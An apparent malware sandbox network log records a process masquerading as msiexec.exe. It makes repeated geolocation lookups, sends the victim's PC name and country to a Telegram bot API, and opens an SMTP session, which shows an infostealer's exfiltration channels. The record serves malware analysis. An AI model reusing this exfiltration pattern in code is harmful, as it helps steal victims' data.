2	192.168.2.4	49933	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:40:52 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 01:40:53 UTC	889	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:52 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwwJ%2FfFchI0zeUinrchwwNhGf8v3hqUwQesZbA7xTGcfZOJ5uVatfJpz3D2baBpB%2FTFK2HYh1zvbl2%2FMQ2HMBA28NPA%2FpmbE9sboBXY6EsJr%2B4HCic3%2B4oKH6ton6u2sd77eziwU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7642e528086c73-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2542581&cwnd=251&unsent_bytes=0&cid=2e0e2185844c2706&ts=427&x=0"
2024-10-24 01:40:53 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:40:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49939	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:40:53 UTC	63	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-24 01:40:54 UTC	896	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:53 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b1yob%2Bvp%2FXQDNJNWnnOcSSnriRaJN9zPX8bhoAmK%2BYh2wNAU5pKqbYGIPQaaR%2F1AxPUA7x2h2Z3ju95%2ByOW9ySlJVA3Y%2BtAywntHCfJdtqURq8V7ohF05NDFav6owCHqGcJ8ARDg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7642ed5a446c5c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2639927&cwnd=251&unsent_bytes=0&cid=52c92f4fd7417e7c&ts=157&x=0"
2024-10-24 01:40:54 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:40:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49955	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:40:56 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 01:40:56 UTC	886	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvmxBcsAU5Ua9UaeWBC4Zjg2eMqwYNexyW9WMROBsP3l3mdXIR5OcdPLuh1JNuNHFILGXV7QZSxzfGrVjkUb8v5HlxmsORzUDKq619BFqyWxfR%2FSTwEHqOV8ycBSErHzF9cko9hV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7642faa8a12d45-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2219&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1758348&cwnd=242&unsent_bytes=0&cid=9a24a5989ceef58b&ts=155&x=0"
2024-10-24 01:40:56 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:40:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49967	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:40:57 UTC	63	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-24 01:40:57 UTC	892	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTL0BkyDHz%2BOVGmBHjk4e1M4lTMOiHcXTC5ECKBpavOCzdnqKXgUpKHtf%2BHpW3O57xeiZ4gFCrqAXqIwwPgmRAIkdcic5nOffKmYMS5dSZwKuqS7UZ%2FaFNX5l0YKglfVc%2FMyakMK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7643053edf6bb3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1295&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=92d53935eec9e9c1&ts=158&x=0"
2024-10-24 01:40:57 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:40:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49981	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:41:00 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 01:41:00 UTC	884	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1bYF1etfTYDraUUh7etU1oJPe6jmSjaZhdPB17TRmwnU8EhQD4Z9zYGhHZ6nwYj3pD8gmBpx5sUAbxXRdnRJPtE1hIHidiO7RvyBhyUCW8fJi1dRpkti4bJxG2fPxpG3cZC1fIo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7643147aafe756-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2132&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1348858&cwnd=251&unsent_bytes=0&cid=0f08f7df76d119d2&ts=157&x=0"
2024-10-24 01:41:00 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:41:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50001	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:41:03 UTC	63	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-24 01:41:03 UTC	895	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 11 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0k%2BmVzqRkCNuxTU5Hq2ScaJBudmGTxajLLy2W%2B0GuboWI9WzBoZ2ldfGrxXvFFwKet6U5op1qAEsXc5uSqN9b7026SP56dv0dRY%2Fa1kEMeWfhBxoM9T4u1Zrn%2B8ZR3UmtOi5a8F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7643265ea3e51c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1219&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2362153&cwnd=249&unsent_bytes=0&cid=4f8afa472689cc00&ts=166&x=0"
2024-10-24 01:41:03 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:41:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50012	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:41:04 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 01:41:04 UTC	887	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk4C3tOc8f5m3pQcLMv8SPl8ncLuy5BBMSKNgK9JcWwU9K13NqTI9yRnXwSvK27ilNZw6RabyNzhxnN%2F01JezqtJycciG4OJOeKbib0m0HLD0YNkqGFycB1X01JKehbxWFQuDQsI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d764330ea68476f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1844&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1540425&cwnd=251&unsent_bytes=0&cid=99a014ef93a8216a&ts=157&x=0"
2024-10-24 01:41:04 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:41:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50018	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:41:06 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 01:41:07 UTC	895	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsfbNjr5Zoha%2B%2BERsX17d1ElNy71CfOPJkZx0SQnt2rFRMPNSqOu%2FUjPsIsdYsTixbRbqBp2PxWR6jkhkFWlwbwxvUoxbny5jfesfzdalmVANV%2By%2BcHC85LwUG1yuYvlFDMqeTCL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d76433eb8f68d2d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1181&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2038001&cwnd=252&unsent_bytes=0&cid=aeb6dba8bacfa10f&ts=153&x=0"
2024-10-24 01:41:07 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:41:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50020	188.114.96.3	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:41:08 UTC	87	OUT	GET /xml/173.254.250.71 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-24 01:41:08 UTC	893	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 16 Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQ6BAUitZDi7FMFxAk7WsHrRm%2FuAsyDVD9M1dDlZXi5zOTEXfkkeN%2Bz33p1aM4IOJFIV3WhVLGSA0QnEUEPWASsAIG2p%2Bu7YGYdSm3m5LYpemNret2pJyknWs35b0BC%2FraD8npvZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d764349385ce97a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2014&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1442231&cwnd=242&unsent_bytes=0&cid=bf7eb890a3f9b710&ts=155&x=0"
2024-10-24 01:41:08 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-24 01:41:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50021	149.154.167.220	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:41:09 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-24 01:41:09 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 24 Oct 2024 01:41:09 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-24 01:41:09 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 24, 2024 03:41:16.947912931 CEST	587	50022	213.165.67.102	192.168.2.4	220 kundenserver.de (mreue011) Nemesis ESMTP Service ready
Oct 24, 2024 03:41:16.948311090 CEST	50022	587	192.168.2.4	213.165.67.102	EHLO 216041
